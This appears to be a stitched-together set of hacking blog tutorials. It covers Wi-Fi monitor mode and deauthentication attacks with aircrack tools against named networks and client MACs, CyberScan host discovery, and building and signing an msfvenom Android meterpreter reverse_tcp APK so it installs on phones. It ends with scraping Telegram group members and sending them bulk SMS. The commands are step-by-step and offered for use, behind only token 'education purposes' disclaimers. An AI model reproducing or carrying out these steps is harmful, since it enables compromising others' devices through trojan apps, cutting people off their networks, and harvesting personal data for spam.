Pre-connection Attack Network Penetration test

Pre-connection Attack

Pre-connection attack is the first part of the network penetration testing. To perform this attack, we will look at the fundamentals like how to show all the networks around us, how to find the details of all the connected devices to a particular network. Once we know about the network and connected devices to it, we can disconnect any device without knowing the password of that device.

Following are the basic steps we will be going through to perform Pre-connection attack:

1. Wireless Interface in Monitor mode: In this step, we will change the mode of wireless device as Monitor mode.
2. About airodump-ng: In this step, we will use airodump-ng to list all the network around us and display useful information about them.
3. Run airodump-ng: In this step, we will see all the devices that are connected to a particular network and collect more information about it.
4. Deauthenticate the Wireless client: In this step, we can disconnect any device which is shown in the previous step using the aireplay-ng.

Wireless interface in Monitor Mode

This step is used to put your wireless card into Monitor mode. In Monitor mode, your card can listen to every packets that's around us. By default, the mode of wireless devices is set to "Managed" that means our wireless device will only capture packets that have our device's MAC address as the destination MAC. It will only capture packets that are actually directly to my Kali machine.

But we want to capture all the packets that are within our range even if the destination MAC is not our MAC or even without knowing the password of the target device. To do this, we need to set the mode as Monitor mode.

We can use iwconfig to see the wireless interfaces.

In the above image, you can see that the wireless interface wlan0 is in Managed mode. Use the following command to set it in Monitor mode.

Where

• ifconfig wlan0 down command is used for disabling the Managed mode
• airmon-ng check kill command is used to kill any process that could interfere with using my interface in monitor mode. After this command, your internet connection will be lost.
• iwconfig wlan0 mode monitor command is used to enable monitor mode
• ifconfig wlan0 up command is used to enable the interface
• iwconfig command shows that the mode is set to Monitor

In the above figure, you can see that the mode is changed as Monitor mode. Now we are able to capture all the Wi-Fi packets that are within our range even if the packets are not directed to our computer or even without knowing the password of the target network.

To do this, we need a program that can capture the packets for us. The program we are going to use is airodump-ng.

About airodump-ng

airdump-ng is used to list all the network around us and display useful information about them. It is a packet sniffer, so it is basically designed to capture all the packets around us while we are in Monitor mode. We can run it against all of the networks around us and collect useful information like the mac address, channel name, encryption type, number of clients connected to the network and then start targeting to the target network. We can also run it against certain AP(access point) so that we only capture packets from a certain Wi-Fi network.

Syntax

1. airodump-ng [MonitorModeInterface]

First, let's look at how to run the program. In this case, we need our Wi-Fi card in Monitor mode. The name of the our Wi-Fi card is wlan0.

Note: We can press Ctrl + C to stop the following execution.

• BSSID shows the MAC address of the target network
• PWR shows the signal strength of the network. Higher the number has better signal
• Beacons are the frames send by the network in order to broadcast its existence
• #Data, shows the number of data packets or the number of data frames
• #/s shows the number of data packets that we collect in the past 10 seconds
• CH shows the channel on which the network works on
• ENC shows the encryption used by the network. It can be WEP, OPN, WPA, WPA2
• CIPHER shows the cipher used in the network
• AUTH shows the authentication used on the network
• ESSID shows the name of the network

In the above image, you can show all the wireless networks like Oppo, perfe, Fligh, Ashu, LIFCA, Xiaom, BS1A-YW5 etc and the detailed information about all the network.

Run airodump-ng

In this step, we will run airodump-ng to see all the devices that are connected to a particular network and collect more information about it. Once we have a network to the target, it's useful to run airodump-ng on that network only, instead of running it on all the networks around us.

Currently, we are running airodump-ng on all the networks around us. Now we are going to target the network BS1A-YW5 whose BSSID is 50:C8:E5:AF:F6:33. We are going to sniff on that network only.

To do this, we will be use the same program. The command will be as follows:

Where

• --bssid 50:C8:E5:AF:F6:33 is the access point MAC address. It is used to eliminate extraneous traffic.
• --channel 11 is the channel for airodump-ng to snif on.
• --write test is used to store all the data in a file named as test. It is not mandatory, you can skip this part.
• wlan0 is the interface name in Monitor mode.

After execution of this command, the following devices will be shown:

Where

• BSSID of all the devices is same because devices are connected to the same network
• STATION shows the number of devices that are connected to this network
• PWR shows the power strength of each of the devices
• Rate shows the speed
• Lost shows the amount of data loss
• Frames show the number of frames that we have captured

After executing this command, we have 3 devices that are connected to the network BS1A-YW5 and all the devices have the same BSSID as 50:C8:E5:AF:F6:33.

Deauthenticate the wireless client

It is also known as deauthentication attacks. These attacks are very useful. These attacks allow us to disconnect any device from any network that is within our range even if the network has encryption or uses a key.

In deauthentication attack, we are going to pretend to be client and send a deauthentication packet to the router by changing our MAC address to the MAC address of the client and tell the router that we want to disconnect from you. At the same time, we are going to pretend to be router by changing our MAC address to the router's MAC address until the client that we are requesting to be disconnected. After this, the connection will be lost. Through this process, we can disconnect or deauthenticate any client from any network. To do this, we will use a tool called aireplay-ng.

First of all, we will run airodump-ng on the target network, because we want to see which clients or devices are connected to it. This time, we will not need the --write option, so we are just going to remove it. After completion the run process of airodump-ng, we are going to disconnect the device with STATION A8:7D:12:30:E9:A4 using the airoplay-ng.

Syntax

1. aireplay-ng --deauth [#DeauthPackets] -a [NetworkMac] -c [TargetMac] [Interface]

After executing this command, the device whose STATION is A8:7D:12:30, lost the internet connection. We can only connect to the network again when we quit this executing command by pressing Ctrl + C.

Where

• -deauth is used to tell airplay-ng that we want to run a deauthentication attack and assign 100000 which is the number of packets so that it keeps sending a deauthentication packets to both the router and client and keep the client disconnected.
• -a is used to specify the MAC address of the router. 50:C8:E5:AF:F6:33 is the target access point.
• -c specifies the MAC address of the client. A8:7D:12:30:E9:A4 is client's MAC address.
• wlan0 is the wireless adaptor in Monitor mode.

CYBER-SCAN

CyberScan is an open source penetration testing tool that can analyse packets , decoding , scanning ports, pinging and geolocation of an IP including (latitude, longitude , region , country ...)

Installation :

$ apt update && apt upgrade

$ apt install git 

$ apt install python2

$ apt install python

$ git clone https://github.com/medbenali/CyberScan.git

$ cd CyberScan

usage :

$ python2 CyberScan.py -v

$ CyberScan -h

We can perform ping operations with several protocols using CyberScan

The fastest way to discover hosts on a local Ethernet network

is to use ARP:

$ python2 CyberScan -s 192.168.1.0/24 -p arp

In case when ICMP echo requests are blocked, we can still use TCP:

$ CyberScan -s 192.168.1.105 -p tcp -d 80

192.168.1.105 = target IP.

 HOW TO Sign the APK File with Embedded Payload 

Hi MoboTherapy families welcome back

Today, I`m gonna show you: "How To Sign the APK File with Embedded Payload". I made this cause many of you asked me to solve  this error (This was built an older version of android and may not work properly.) The following Methods work 100%. So, Follow the steps carefully.

If you asked me why we have to sign the Apk file and here is why 

In Modern Android Phones, Unsigned APK files can be Easily installed. But Older versions of Android does not Support the installation of Unsigned APK files. This is not a common Problem. But for Publishers and Hackers, it can create a lot of problem, because Unsigned APK files give error on Older Android Versions & cannot be EVEN Uploaded on Google Play or Play Store.

To Manually & Properly Sign the APK, you have to Follow the Following steps Carefully!

Let's begin...

• Requirements

1). Kali Linux (Latest Version is Preferred)
2). ava v8 or above (Latest Version is Preferred)

3). ZipAlign Tool (Download it HERE , Install instructions included)

• Installation

1). Latest version of JAVA is already installed in Kali Linux. So you don`t need to download it Manually.

2). Zip-Align Tool can be found HERE. Installation instructions are Discussed there. If you have any Problems, you can install by type these commands

1. Update the package index:

    # sudo apt-get update

      

      2. Install zipalign deb package    

    # sudo apt-get install zipalign 

OR

1. Update the package index:

   # sudo apt-get update

2. Install google-android-build-tools-installer deb package:

   # sudo apt-get install google-android-build-tools-installer

3). Here I am gonna Generate a Key named key.jks for Kali.apk , which is already generated by msfvenom command

• Signing the APK File Manually

1). First, generate an Un-Signed APK File with Embedded Payload:

msfvenom -p android/meterpreter/reverse_tcp LHOST=(your-IP) LPORT=(desired-port) R > Kali.apk

2.) Now we are gonna Generate a key key.jks with KeyTool. For this, type in Terminal (screenshot Below):

 

  keytool -genkey -v -keystore key.jks -keyalg RSA -keysize 2048 -validity 10000 -alias my-alias

3). Enter a Rememberable KeyStore Password. (i.e. 123456)

4). Now, it will ask about your Personnel Information. Just Randomly fill the Form (i.e. like I do it above in the screenshot), and finally Type: yes , This will Successfully Generate a key.

5). BINGO...!!!!!!!! APK file has been signed. Now the most important step; Zip Aligning is Left, Just type the following command in terminal, and GET the Signed Kali.apk:

zipalign -v 4 Kali.apk Kali-Signed.apk

                                            DONE 

 You have Successfully Generated SIGNED APK 

                                             FILE

Location

Your Manually SIGNED Apk File, with Embedded Payload can be found here :

/root/payloadapk-Signed.apk

Note: This all about, there are many methods in the internet  this is not the only one you can check them if this method isn't satisfied you. I hope you can solve your problem and enjoy thank you.

DISCLAIMER : This Thread is only for Education Purposes. I will not be Responsible of Any Illegal use of this information. Try not to HACK the Androids, other than your`s.

How to scrap Telegram Account using Termux

How To Scrap Telegram Group Member

System Hacking

This is how to scrape a Telegram group member. I'm pretty sure that you like it.

please like this video and if you find any problem please leave a comment.

And please support me by subscribing to get you like this for the future. And follow me in this Blog I will try my all best to work hard for you.

TOOLS

$ pkg install -y git python $ git clone https://github.com/th3unkn0n/TeleGram-Scraper.git $ cd TeleGram-Scraper Install requirements $ python3 setup.py -i setup configuration file ( apiID, apiHASH ) $ python3 setup.py -c To Generate User Data $ python3 scraper.py ( members.csv is the default if you changed the name to use it )Send Bulk SMS To Collected Data $ python3 smsbot.py members.csv Update Tool $ python3 setup.py -u • API Setup

• Go to http://my.telegram.org and log in.
• Click on API development tools and fill the required fields. put app name you want & select other in platform Example :
• Click on API development tools and fill the required fields.
• put app name you want & select other in platform Example : copy "api_id" & "api_hash" after clicking create an app ( will be used in setup.py

DISCLAIMER : This Thread is only for Education Purposes. I will not be Responsible of Any Illegal use of this information. Try not to HACK the Androids, other than your`s.